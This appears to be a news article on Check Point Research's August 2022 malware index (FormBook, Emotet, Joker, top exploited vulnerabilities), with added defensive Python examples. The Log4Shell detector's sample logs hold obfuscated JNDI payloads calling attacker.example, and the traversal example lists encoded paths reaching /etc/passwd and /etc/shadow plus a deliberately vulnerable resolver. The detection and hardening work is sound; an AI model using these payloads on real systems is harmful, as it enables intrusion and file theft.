Emotet lost first place

FormBook is now the most prevalent malware, taking over from Emotet, which had held that position since its re-emergence in January, according to Check Point Research's Global Threat Index for August 2022.

FormBook is an infostealer targeting the Windows operating system. Once deployed, it can harvest credentials, capture screenshots, monitor and log keystrokes, and download and execute files on instruction from its command and control (C&C) server. Since it was first spotted in 2016 it has steadily made a name for itself, marketed as Malware as a Service (MaaS) on underground hacking forums and known for its powerful evasion techniques and relatively low price.

August also saw a rapid increase in GuLoader activity, making it the fourth most prevalent malware. GuLoader was originally used to download Parallax RAT, but has since been applied to other remote access Trojans and information stealers such as Netwire, FormBook, and Agent Tesla. It is usually distributed through extensive phishing email campaigns, which trick the victim into downloading and opening a malicious file, allowing the malware to get to work.

Additionally, Check Point Research reports that Joker, an Android spyware, is back in business and claimed the third spot in this month's mobile malware list. Once installed, Joker can steal text messages, contact lists and device information, and can subscribe the victim to paid premium services without their consent. Its rise can partly be explained by an increase in campaigns; it was recently spotted active in several apps on the Google Play Store.

“The changes we’re seeing in this month’s index, from Emotet rising from first to fifth place to Joker becoming the third most prevalent mobile malware, reflect how quickly the threat landscape can change,” says Maya Horowitz, vice president of research at Check Point Software.

“This should remind individuals and businesses alike of the importance of keeping up to date with the latest threats, because knowing how to protect yourself is essential. Threat actors are constantly evolving, and the emergence of FormBook shows that one can never be complacent about security and must take a holistic, prevention-focused approach across networks, endpoints and the cloud.”

Check Point Research (CPR) also revealed this month that the education and research sector remains the industry most targeted by cybercriminals globally, with government/military and healthcare taking second and third place. Apache Log4j Remote Code Execution returned to the top spot as the most exploited vulnerability, affecting 44% of organizations worldwide, overtaking Web Server Exposed Git Repository Information Disclosure, which had an impact of 42%.

Top Malware Families in Australia

FormBook was the most widespread malware this month, affecting 5.10% of organizations globally and 4.03% of organizations in Australia, followed by Emotet with an impact of 2.10% of organizations worldwide and 2.02% in Australia, and XMRig with an impact of 2.10% worldwide and 0.90% in Australia.

FormBook is an infostealer targeting the Windows operating system and was first detected in 2016. It is marketed as Malware as a Service (MaaS) on underground hacking forums, known for its powerful evasion techniques and relatively low price. FormBook harvests credentials from various web browsers, collects screenshots, monitors and logs keystrokes, and can download and execute files on command from its C&C server.

Emotet is an advanced, self-propagating and modular Trojan. Emotet was once used as a banking Trojan, but more recently it has been used as a distributor for other malware and malicious campaigns. It uses multiple methods to maintain persistence, along with evasion techniques to avoid detection. It can also spread through phishing spam emails that contain malicious attachments or links.

XMRig is open-source CPU mining software used to mine the Monero cryptocurrency. Threat actors often misuse it by bundling it with their malware to conduct illicit mining on victims' devices.

Top Malware Families in New Zealand

Emotet surged in New Zealand, displacing July's leader to become the most prevalent malware, with an impact on 2.61% of New Zealand organizations and 2.10% of organizations globally. It is followed by XMRig, with an impact of 2.10% globally and 1.12% in New Zealand, and Remcos, with an impact of 1.12% in New Zealand and 1.00% of organizations globally.

Emotet and XMRig are described in the Australia list above.

Remcos is a RAT that first appeared in the wild in 2016. It is distributed via malicious Microsoft Office documents attached to spam emails, and is designed to bypass Microsoft Windows UAC and run malware with elevated privileges.

Main industries attacked in Australia

This month, the education/research sector remained in first place as the most attacked industry in Australia, followed by government/military and insurance/legal.

Main exploited vulnerabilities

This month, Apache Log4j Remote Code Execution is the most commonly exploited vulnerability, affecting 44% of organizations worldwide, followed by Web Server Exposed Git Repository Information Disclosure, which dropped from first to second place with an impact of 42%. Web Servers Malicious URL Directory Traversal remains in third place, with a global impact of 39%.

Apache Log4j Remote Code Execution (CVE-2021-44228, commonly called Log4Shell) – A remote code execution vulnerability exists in Apache Log4j. Successful exploitation could allow a remote attacker to execute arbitrary code on the affected system.
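Exploitation of this flaw relies on getting a `${jndi:...}` lookup string into something the application logs (a User-Agent, a query parameter, a username), and attackers routinely hide the `jndi` prefix behind nested Log4j lookups such as `${lower:j}` or `${::-j}`, which a plain substring search misses. The following detector is an added example written for this page, not code from Check Point Research; the access-log lines are constructed for the example and the attacker hostnames are hypothetical. It flattens the common obfuscation lookups the way Log4j itself would before matching, and it also URL-decodes the line once so payloads encoded in the request line are seen.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines for this example (not real traffic).
# Indexes 1-3 carry a JNDI lookup (plain, nested-lookup obfuscated, URL-encoded);
# index 4 is a non-JNDI lookup and index 5 merely mentions the keywords.
SAMPLE_LOGS = [
    '10.0.0.5 - - [20/Aug/2022:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [20/Aug/2022:10:01:07 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [20/Aug/2022:10:01:09 +0000] "GET /login HTTP/1.1" 200 88 "-" "${${lower:j}${upper:n}di:${::-l}${::-d}ap://attacker.example/b}"',
    '10.0.0.11 - - [20/Aug/2022:10:01:30 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fc%7D HTTP/1.1" 200 120 "-" "curl/7.79"',
    '10.0.0.12 - - [20/Aug/2022:10:02:00 +0000] "GET /api?x=${env:HOME} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.14 - - [20/Aug/2022:10:02:30 +0000] "GET /search?q=jndi+ldap HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

# An innermost ${...} lookup: a body containing no nested '$', '{' or '}'.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# The prefix Log4j dispatches on. Log4j lower-cases the prefix before
# dispatch, so the match must be case-insensitive.
JNDI_PREFIX = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _flatten_one(body: str):
    """Resolve one innermost lookup body the way Log4j would, for the lookups
    attackers use purely to hide the 'jndi' prefix. Returns None for anything
    else so that lookup is left in place (and can then be matched)."""
    if ":-" in body:                       # ${env:UNSET:-j} or ${::-j} -> default value
        return body.split(":-", 1)[1]
    name, sep, arg = body.partition(":")
    if sep and name.lower() == "lower":    # ${lower:J} -> j
        return arg.lower()
    if sep and name.lower() == "upper":    # ${upper:n} -> N
        return arg.upper()
    return None


def normalize(text: str) -> str:
    """Repeatedly flatten innermost obfuscation lookups until nothing changes.
    Every pass that changes the text removes at least one '${', so it ends."""
    while True:
        changed = False

        def repl(m):
            nonlocal changed
            resolved = _flatten_one(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        text = INNER_LOOKUP.sub(repl, text)
        if not changed:
            return text


def is_log4shell_attempt(line: str) -> bool:
    """True if the line carries a (possibly obfuscated) ${jndi:...} lookup."""
    return bool(JNDI_PREFIX.search(normalize(unquote(line))))


def scan(lines):
    """Return the log lines that carry a JNDI lookup."""
    return [line for line in lines if is_log4shell_attempt(line)]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print("JNDI lookup:", hit)
```

Run against the sample, `scan` flags lines 1 to 3 and leaves the `${env:HOME}` lookup and the harmless search query alone. The flattening covers only the obfuscations shown; attackers vary them, so log matching is a supplement to upgrading Log4j to a fixed release, not a replacement for it.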

Web Server Exposed Git Repository Information Disclosure – An information disclosure vulnerability has been reported for Git repositories left exposed on web servers. Successful exploitation could allow inadvertent disclosure of account information.
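The practical check for this finding is to request `/.git/HEAD` and `/.git/config` on your own hosts and look at what comes back; the account information mentioned above typically leaks through a remote URL in `.git/config` that embeds a username and token. The code below is an added example for this page, not Check Point Research's tooling. It does not perform the HTTP requests (so it runs offline); the two sets of responses are constructed, the hostnames are hypothetical, and the token is a made-up placeholder. The point it makes is that a 200 status alone proves nothing, because many frameworks answer unknown paths with a 200 "soft 404" page, so the body must look like the real file.

```python
import re

# Constructed (status, body) responses for two hypothetical hosts.
# The token in the remote URL is a made-up placeholder, not a real credential.
EXPOSED_HOST = {
    "/.git/HEAD": (200, "ref: refs/heads/main\n"),
    "/.git/config": (200,
        "[core]\n"
        "\trepositoryformatversion = 0\n"
        "\tfilemode = true\n"
        "\tbare = false\n"
        '[remote "origin"]\n'
        "\turl = https://deploy:EXAMPLE_TOKEN@git.example.internal/acme/site.git\n"
        "\tfetch = +refs/heads/*:refs/remotes/origin/*\n"),
}
# A host whose framework answers every unknown path with a 200 "soft 404" page.
SOFT_404_HOST = {
    "/.git/HEAD": (200, "<html><body><h1>Page not found</h1></body></html>"),
    "/.git/config": (200, "<html><body><h1>Page not found</h1></body></html>"),
}

# A real HEAD is a symbolic ref or a bare commit hash (SHA-1 or SHA-256 repositories).
HEAD_RE = re.compile(r"\A(?:ref: refs/\S+|[0-9a-f]{40}|[0-9a-f]{64})\s*\Z")
# user[:secret]@ immediately after the scheme of a remote URL.
URL_CRED_RE = re.compile(r"^[a-z][a-z0-9+.-]*://(?P<user>[^:/@]+)(?::[^@]*)?@", re.I)


def parse_git_config(text):
    """Minimal parser for Git's INI dialect. configparser would treat Git's
    tab-indented keys as continuation lines, so the lines are split by hand."""
    entries, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip()
            continue
        key, sep, value = line.partition("=")
        if sep and section is not None:
            entries[(section, key.strip())] = value.strip()
    return entries


def assess_git_exposure(responses):
    """Classify a host from its /.git/HEAD and /.git/config responses."""
    result = {"head_exposed": False, "config_exposed": False,
              "remotes": [], "credentialed_remotes": []}
    status, body = responses.get("/.git/HEAD", (0, ""))
    result["head_exposed"] = status == 200 and bool(HEAD_RE.match(body))
    status, body = responses.get("/.git/config", (0, ""))
    entries = parse_git_config(body) if status == 200 else {}
    result["config_exposed"] = ("core", "repositoryformatversion") in entries
    for (section, key), value in entries.items():
        if key == "url":
            result["remotes"].append(section)
            m = URL_CRED_RE.match(value)
            if m:
                # Report the account name only; never log the secret itself.
                result["credentialed_remotes"].append((section, m.group("user")))
    return result


if __name__ == "__main__":
    print("exposed host:", assess_git_exposure(EXPOSED_HOST))
    print("soft-404 host:", assess_git_exposure(SOFT_404_HOST))
```

On the exposed host the check reports both files, the `origin` remote and the `deploy` account embedded in its URL; on the soft-404 host both flags stay false despite the 200 responses. Blocking `/.git/` at the web server (or not deploying the directory at all) is the fix; rotating any credential found in a leaked config is the follow-up.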

Web Servers Malicious URL Directory Traversal – A directory traversal vulnerability exists on various web servers. It is caused by an input validation error in a web server that does not properly sanitize the URI for directory traversal patterns. Successful exploitation allows unauthenticated remote attackers to disclose or access arbitrary files on the vulnerable server.
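The "input validation error" described above is almost always the same mistake: the server decodes the URI, glues it onto the document root and opens the result, without ever checking where the `..` segments actually lead. The snippet below is an added example for this page, not code from any web server or from Check Point Research. It shows a deliberately vulnerable resolver beside a hardened one; the document root `/var/www/html` and all request paths are constructed for the example. The hardened version decodes until the path is stable (so double encoding such as `%252e%252e` is seen as `..`), rejects NUL bytes, treats backslashes as separators, and then checks containment on the normalized result rather than on the raw input.

```python
import posixpath
from urllib.parse import unquote

WEBROOT = "/var/www/html"   # assumed document root for this example


def resolve_vulnerable(uri_path: str) -> str:
    """What a careless handler does: decode once, glue onto the web root and
    hand the result to open(). Nothing checks that '..' stays inside the root."""
    return WEBROOT + "/" + unquote(uri_path).lstrip("/")


def escapes_root(path: str) -> bool:
    """Where the OS would actually land after resolving the '..' segments."""
    final = posixpath.normpath(path)
    return not (final == WEBROOT or final.startswith(WEBROOT + "/"))


def resolve_hardened(uri_path: str):
    """Return the filesystem path to serve, or None to reject the request."""
    # 1. Decode until stable (bounded) so %252e%252e is seen as '..' too.
    decoded = uri_path
    for _ in range(3):
        step = unquote(decoded)
        if step == decoded:
            break
        decoded = step
    if unquote(decoded) != decoded:
        return None                      # still encoded after 3 rounds: reject
    # 2. NUL bytes truncate paths in C-level file APIs; never pass them on.
    if "\x00" in decoded:
        return None
    # 3. Backslashes are separators on Windows hosts; treat them that way here.
    decoded = decoded.replace("\\", "/")
    # 4. Normalize lexically, then check containment on the result, not the input.
    candidate = posixpath.normpath(posixpath.join(WEBROOT, decoded.lstrip("/")))
    if candidate != WEBROOT and not candidate.startswith(WEBROOT + "/"):
        return None
    return candidate


# Constructed request paths and the result the hardened resolver should give.
CASES = {
    "/index.html": "/var/www/html/index.html",
    "/static/../index.html": "/var/www/html/index.html",
    "/../../../etc/passwd": None,
    "/%2e%2e/%2e%2e/%2e%2e/etc/passwd": None,
    "/%252e%252e/%252e%252e/%252e%252e/etc/shadow": None,
    "/css/..%5c..%5c..%5cwindows/win.ini": None,
    "/img/a%00.png/../../../../etc/passwd": None,
}

if __name__ == "__main__":
    for uri, expected in CASES.items():
        naive = resolve_vulnerable(uri)
        print(f"{uri!r:50} vulnerable->{'ESCAPES' if escapes_root(naive) else 'inside ':8} "
              f"hardened->{resolve_hardened(uri)}")
```

Two caveats a deployment needs beyond this: `posixpath.normpath` is purely lexical, so on a live filesystem the containment check should be made on `os.path.realpath(candidate)` to account for symlinks inside the root, and the decode loop deliberately rejects input that is still encoded after three rounds rather than trying to guess what the attacker meant.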

Top Mobile Malware

This month, AlienBot is the most prevalent mobile malware, followed by Anubis and Joker.

AlienBot is a banking Trojan for Android, sold as Malware-as-a-Service (MaaS). It supports keylogging, dynamic overlays for credential theft, as well as SMS collection for 2FA bypass. Additional remote control functionality is provided using a TeamViewer module.

Anubis is a banking Trojan designed for Android mobile phones. Since its initial detection it has acquired additional features, including Remote Access Trojan (RAT) functionality, keylogging and audio recording capabilities as well as various ransomware features. It has been detected in hundreds of different apps available on the Google Play Store.

Joker is Android spyware in Google Play designed to steal SMS messages, contact lists and device information. Moreover, the malware can also subscribe the victim to paid premium services without their knowledge or consent.
